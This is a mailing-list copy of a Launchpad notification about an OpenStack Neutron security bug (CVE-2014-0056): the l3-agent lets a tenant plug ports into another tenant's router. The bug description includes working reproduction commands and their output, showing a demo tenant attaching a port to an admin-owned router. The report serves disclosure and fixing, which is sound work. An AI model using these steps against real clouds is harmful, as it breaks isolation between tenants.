** Changed in: neutron
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1243327
Title:
[OSSA 2014-008] Routers can be cross plugged by other tenants
(CVE-2014-0056)
Status in OpenStack Neutron (virtual network service):
Fix Released
Status in neutron grizzly series:
In Progress
Status in neutron havana series:
Fix Committed
Status in OpenStack Security Advisories:
Fix Released
Bug description:
The l3-agent does not check tenant_id and allows for tenants to be
able to plug ports into other's routers if the device_id is set to
another tenants router.
# become admin tenant
arosen@arosen-desktop:~/devstack$ source openrc admin admin
# Create router as admin:
arosen@arosen-desktop:~/devstack$ neutron router-create admin-router
Created a new router:
+-----------------------+--------------------------------------+
| Field | Value |
+-----------------------+--------------------------------------+
| admin_state_up | True |
| external_gateway_info | |
| id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 |
| name | admin-router |
| status | ACTIVE |
| tenant_id | 04e94acfe69f4960a69c6a78d39466c4 |
+-----------------------+--------------------------------------+
# Become demo tenant
arosen@arosen-desktop:~/devstack$ source openrc demo demo
#create port with correct device_id and device_owner
arosen@arosen-desktop:~/devstack$ neutron port-create private --device-id
80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 --device-owner network:router_interface
Created a new port:
+-----------------------+---------------------------------------------------------------------------------+
| Field | Value
|
+-----------------------+---------------------------------------------------------------------------------+
| admin_state_up | True
|
| allowed_address_pairs |
|
| device_id | 80ffe19a-649c-4fc9-a0d9-2a3d67c5f600
|
| device_owner | network:router_interface
|
| fixed_ips | {"subnet_id":
"5786a0a6-24c8-4156-b981-cc817011c6a7", "ip_address": "10.0.0.3"} |
| id | 895cf428-4bfb-4c79-86c2-d40af9bf3587
|
| mac_address | fa:16:3e:21:33:6c
|
| name |
|
| network_id | 4de8b4f6-ac11-4836-aefb-7ed4f49ab9a7
|
| security_groups |
|
| status | DOWN
|
| tenant_id | ad069ea620614cce9c4b6f088d39d03e
|
+-----------------------+---------------------------------------------------------------------------------+
Now when the l3-agent is restarted or enters its periodic sync state:
arosen@arosen-desktop:~/devstack$ sudo ip netns exec
qrouter-80ffe19a-649c-4fc9-a0d9-2a3d67c5f600 ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
qr-895cf428-4b Link encap:Ethernet HWaddr fa:16:3e:21:33:6c
inet addr:10.0.0.3 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::f816:3eff:fe21:336c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:300 (300.0 B) TX bytes:398 (398.0 B)
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1243327/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
